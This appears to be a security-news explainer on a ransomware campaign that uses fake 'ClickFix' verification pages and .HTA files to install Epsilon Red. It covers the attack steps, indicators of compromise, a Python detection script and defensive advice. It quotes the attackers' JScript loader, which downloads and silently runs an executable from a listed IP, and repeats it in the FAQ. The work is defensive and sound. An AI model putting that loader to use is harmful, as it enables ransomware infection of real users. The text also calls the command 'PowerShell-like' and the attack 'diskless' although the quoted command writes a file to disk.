What is the .HTA Red Ransomware attack and how are hackers using verification scams to infect victims?

In July 2025, cybersecurity researchers uncovered a new ransomware campaign using weaponized .HTA (HTML Application) files disguised as fake verification pages to spread the Epsilon Red ransomware. These pages, designed to mimic platforms like Discord, Twitch, Kick, and OnlyFans, trick users into clicking a “Verify” button. Once clicked, the page executes malicious scripts using ActiveX controls through Internet Explorer’s engine. These scripts download and run the ransomware on the system without alerting the user. The ransomware encrypts data, leaves a ransom note, and bypasses modern security protections like SmartScreen and antivirus tools. Victims are advised to disable ActiveX, block suspicious domains, and avoid unknown verification prompts.

What Happened?

A new ransomware campaign has been discovered where hackers are using .HTA (HTML Application) files to install Epsilon Red ransomware on victims' computers. These .HTA files look like normal web pages but contain hidden malicious code.

The attackers are disguising these files as verification pages branded “ClickFix” on popular platforms like Discord, Twitch, Kick, and OnlyFans. Users are tricked into clicking on them, believing it's just part of a normal login or verification process.

How Does the Attack Work?

Here’s how this dangerous attack unfolds:

  1. User visits a fake verification page – It looks real and asks the user to “prove they are human.”

  2. User clicks a button – This triggers a redirect to another page with embedded code.

  3. Code runs in the background using ActiveX (Internet Explorer engine) – This allows it to bypass modern browser protections.

  4. Windows Script Host (WSH) runs hidden commands – A PowerShell command downloads and runs ransomware silently.

  5. The ransomware encrypts files and drops a ransom note – Just like many other ransomware types, victims are asked to pay for decryption.

Why Is This Attack Dangerous?

  • It uses outdated but still enabled technology (like ActiveX).

  • It bypasses antivirus and browser warnings.

  • Victims don’t even realize something was installed until it’s too late.

  • The ransomware runs without needing admin permissions—just normal user access is enough.

Infection Technique Breakdown

Here’s a simple breakdown of the malicious script used in the attack:

var shell = new ActiveXObject("WScript.Shell");
shell.Run("cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155.227:2269/dw/vir.exe && a.exe", 0);

This code does three things:

  • Goes to your user directory.

  • Downloads the malware file (vir.exe).

  • Runs it silently in the background.

To make it more convincing, the script then displays a fake verification code:

shell.Run("cmd /c echo Your Verification Code Is: P3L9X & pause");

This keeps the user busy while the ransomware spreads.
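The chain above (mshta.exe launching cmd.exe, a curl download of an .exe that is executed in the same command line, then a decoy "Your Verification Code" echo) is visible in process-creation telemetry. The following detection logic is an added example, not code from the original report: it runs over constructed Sysmon-style Event ID 1 records (assumed field names ParentImage, Image, CommandLine) and tags the patterns this campaign exhibits, using only the indicators the page lists.

```python
import re

# Constructed sample events modelled on Sysmon Event ID 1 (process creation).
# Paths and command lines are made up to mirror the page's script; not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\mshta.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c cd /D C:\Users\alice && curl -s -o a.exe http://155.94.155.227:2269/dw/vir.exe && a.exe"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c echo Your Verification Code Is: P3L9X & pause"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c dir"},
    {"ParentImage": r"C:\Program Files\Git\cmd\git.exe", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -s -o release.zip https://example.invalid/release.zip"},
]

# Children that an HTA host has no benign reason to spawn on most endpoints.
SCRIPT_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                   "curl.exe", "certutil.exe"}
DOWNLOAD_RE = re.compile(r"\b(curl|certutil|bitsadmin|invoke-webrequest|iwr|downloadfile)\b", re.I)
EXE_RE = re.compile(r"\.exe\b", re.I)
DECOY_RE = re.compile(r"verification code", re.I)
# Infrastructure named in the report (the only page-specific indicators used here).
KNOWN_CAMPAIGN_INFRA = ("155.94.155.227", "213.209.150.188", "twtich.cc", "capchabot.cc")


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(ev):
    """Return the alert tags that apply to one process-creation event ([] if benign)."""
    tags = []
    parent, child, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
    if parent == "mshta.exe" and child in SCRIPT_CHILDREN:
        tags.append("mshta_spawned_shell")
        # Download tool plus an .exe in the same command line = download-and-execute.
        if DOWNLOAD_RE.search(cmd) and EXE_RE.search(cmd):
            tags.append("download_and_execute")
        if DECOY_RE.search(cmd):
            tags.append("fake_verification_decoy")
    if any(ioc in cmd for ioc in KNOWN_CAMPAIGN_INFRA):
        tags.append("known_campaign_infra")
    return tags


def scan(events):
    """Yield (index, tags) for every event that raises at least one tag."""
    return [(i, classify_event(e)) for i, e in enumerate(events) if classify_event(e)]


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], "->", ", ".join(tags))
```

The mshta.exe parent/child rule fires on its own, so it still catches a variant that swaps curl for another downloader or changes its infrastructure.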

Summary Table of Key Attack Details

Category | Details
Attack Vector | Fake ClickFix verification pages on Discord, Twitch, Kick, OnlyFans
Malware Used | Epsilon Red Ransomware
Delivery Method | Weaponized .HTA files with ActiveX + Windows Script Host
Code Execution | JavaScript + mshta.exe + PowerShell
Ransom Note Style | Similar to REvil, minor changes in grammar
Threat Actor Infra | Domains: twtich[.]cc, capchabot[.]cc; IPs: 155.94.155.227, 213.209.150.188
Impact | Full user-level file encryption, persistence, network scanning

How to Stay Safe From This Ransomware

Here are some steps users and organizations can take to protect themselves:

✅ Disable Legacy Technologies

  • Turn off ActiveX and Windows Script Host if not required.

  • Block Internet Explorer rendering engine in all modern browsers.

✅ Enforce Modern Security Policies

  • Use modern browsers like Chrome or Edge with SmartScreen enabled.

  • Avoid running .HTA files, especially if downloaded from the internet.

✅ Block Malicious Infrastructure

  • Blacklist domains and IPs mentioned in the report.

  • Monitor outbound connections to suspicious hosts.

✅ Educate Users

  • Run phishing simulations.

  • Train users to spot fake verification pages or suspicious popups.

Conclusion

This attack highlights how outdated technologies can still pose modern threats. The use of .HTA files, ActiveX controls, and Windows Script Host gives attackers a powerful way to infect systems quietly.

Users should be careful when asked to verify accounts on unknown websites. If something feels suspicious, it probably is.

Always double-check the URL, don't download unexpected files, and use security tools that monitor script-based threats.

Stay Cyber Safe

  • Update your systems regularly

  • Use strong antivirus tools with behavior-based detection

  • Disable unnecessary Windows features like ActiveX and WSH

  • Never download .hta, .exe, or .bat files from unknown sources

Frequently Asked Questions (FAQ)

What is a .HTA file and why is it dangerous?

A .HTA (HTML Application) file can execute scripts like JavaScript or VBScript on a system. It runs with the same privileges as an EXE file, making it dangerous when used maliciously.

How are hackers tricking users with these files?

Hackers create fake verification pages that look like real sites. When users click “Verify,” they unknowingly download and run .HTA files which install ransomware.

What is Epsilon Red ransomware?

Epsilon Red is a ransomware variant that encrypts data, demands payment, and often leaves minimal traces during the initial infection stage.

What platforms are being impersonated in this campaign?

Hackers are using fake versions of Discord, Twitch, Kick, and OnlyFans to lure users into clicking malicious links.

How does mshta.exe play a role in this attack?

The mshta.exe tool is used to run .HTA files. In this attack, it executes JavaScript that downloads ransomware in the background.

What is ActiveX and how is it exploited?

ActiveX is a legacy Windows component. Hackers use it to execute commands directly from the browser, especially using Internet Explorer’s engine.

Why is this attack hard to detect?

It runs scripts in memory without creating obvious files. This makes it harder for antivirus programs to catch it in time.

Are modern browsers safe from this attack?

Modern browsers are safer but if Internet Explorer components are still enabled, the system is at risk.

What command is used to install the ransomware?

A PowerShell-like command is used:

var shell = new ActiveXObject("WScript.Shell");
shell.Run("cmd /c curl -s -o a.exe http://... && a.exe", 0);

What kind of ransom note is left behind?

The ransom note mimics REvil’s style but with slight grammatical changes, showing it was likely created by a different group.

What IP addresses and domains were involved?

Domains like twtich[.]cc, capchabot[.]cc, and IPs 155.94.155.227:2269, 213.209.150.188:8112 were used in the campaign.

How can I protect my system from this threat?

Disable ActiveX and WScript, block the identified domains/IPs, and avoid clicking unknown verification links.

What is WScript.Shell used for in this attack?

It allows the script to run command-line actions in the background, like downloading and launching malware.

What does “diskless execution” mean?

The malware runs entirely in memory without writing files to disk, making it stealthy and hard to detect.

Are organizations at higher risk?

Yes, especially if they allow browser plugins or still use legacy components like ActiveX.

What is ClickFix in this campaign?

ClickFix is the fake brand used in the scam to convince users to go through a verification step.

How does the fake verification work?

It shows a page asking users to click a button to verify their identity. Clicking triggers the malicious download.

What type of user privileges does the malware get?

It runs with user-level permissions but can still encrypt files and access network resources.

What’s the role of Internet Explorer in this attack?

Though outdated, its rendering engine is used to support ActiveX in this scam.

Can antivirus software stop this?

Not always. Since the attack runs in memory and uses legit Windows tools, it can bypass many defenses.

What is schtasks and why is it used?

schtasks is a tool to schedule tasks in Windows. The malware uses it to maintain persistence after a reboot.

How does the fake verification distract users?

After running the malware, it shows a message like “Your Verification Code Is: P3L9X” to look legitimate.

How fast does Epsilon Red encrypt files?

It begins encryption almost immediately after installation, making quick detection difficult.

What kind of files are targeted by this ransomware?

It typically targets documents, images, and important data files for ransom leverage.

Is this campaign active globally?

Yes, users from multiple countries have reported infections from this scam.

Can I remove this ransomware without paying?

If backups exist and response is quick, yes. Otherwise, decryption is difficult without the attacker’s key.

How can enterprises stop such attacks?

Regular security training, disabling outdated technologies, and blocking suspicious network activity are key.

Why do attackers prefer .HTA files now?

They are less suspicious than .exe files and can easily bypass many browser download warnings.

How can I recognize a fake verification page?

Look at the domain name, lack of HTTPS, and unusual prompts to click or download something.

Should I stop using Internet Explorer completely?

Yes. It’s outdated and prone to security risks. Use modern browsers like Chrome or Firefox.

Is user education enough to stop this?

It helps a lot, but technical defenses like firewalls and endpoint protection are equally important.